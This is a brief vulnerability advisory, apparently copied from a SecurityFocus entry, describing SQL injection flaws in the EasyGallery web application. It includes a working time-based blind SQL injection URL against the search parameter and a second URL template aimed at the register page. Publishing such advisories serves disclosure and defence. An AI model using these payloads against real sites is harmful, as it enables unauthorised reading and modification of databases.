9 lines
No EOL
573 B
Text
9 lines
No EOL
573 B
Text
source: https://www.securityfocus.com/bid/49458/info
|
|
|
|
EasyGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1
|
|
|
|
http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0 |